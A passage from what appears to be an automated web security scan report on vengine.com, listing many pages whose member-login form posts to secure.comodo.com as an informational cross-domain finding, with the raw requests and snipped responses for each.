User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:35 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.23. http://www.vengine.com/corporate/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/about.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /corporate/about.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/support/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.4.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:29 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vengine.com - Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.24. http://www.vengine.com/corporate/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/contact.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /corporate/contact.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.5.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:31 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Software
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.25. http://www.vengine.com/products/best_practices.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/best_practices.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:12 GMT
Content-Type: text/html
Content-Length: 20164
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Protecti
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.26. http://www.vengine.com/products/features.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/features.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 13411
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Authentic
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.27. http://www.vengine.com/products/free_tools.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/free_tools.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/free_tools.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.2.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:14 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 15834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.28. http://www.vengine.com/products/overview.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/overview.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 10595
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Attacks
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.29. http://www.vengine.com/products/prove_it.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/prove_it.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/prove_it.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/contact.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.6.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:55 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">


Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.30. http://www.vengine.com/products/tour.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/tour.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:11 GMT
Content-Type: text/html
Content-Length: 12345
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Ban
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.31. http://www.vengine.com/products/vengine/eula.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/eula.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 18642
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.32. http://www.vengine.com/products/vengine/faq.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/faq.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:09 GMT
Content-Type: text/html
Content-Length: 14577
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Sit
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.33. http://www.vengine.com/products/vengine/first_time.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/first_time.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 10909
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Security
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.34. http://www.vengine.com/products/vengine/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/help.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:04 GMT
Content-Type: text/html
Content-Length: 12152
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Fraudste
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.35. http://www.vengine.com/products/vengine/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:37 GMT
Content-Type: text/html
Content-Length: 11866
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Site Authenticati
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.36. http://www.vengine.com/products/vengine/options.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/options.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 11277
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Anti Phishin
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.37. http://www.vengine.com/products/vengine/requirements.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/requirements.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 10780
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Installing Verifi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.38. http://www.vengine.com/products/vengine/setup.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/setup.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:06 GMT
Content-Type: text/html
Content-Length: 11624
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Anti Phi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.39. http://www.vengine.com/products/vengine/ssl_feedback.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/ssl_feedback.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/ssl_feedback.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/vengine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.9.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:42:53 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificates
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.40. http://www.vengine.com/products/vengine/uninstall.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/uninstall.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:08 GMT
Content-Type: text/html
Content-Length: 10248
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Download Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.41. http://www.vengine.com/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /sitemap.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:16 GMT
Content-Type: text/html
Content-Length: 11070
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Sitemap - Anti Ph
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.42. http://www.vengine.com/support/faq.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/faq.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:13 GMT
Content-Type: text/html
Content-Length: 15273
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.43. http://www.vengine.com/support/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /support/index.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/free_tools.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.3.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:23 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.44. https://www.vengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vengine.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:40 GMT
Content-Type: text/html
Content-Length: 11760
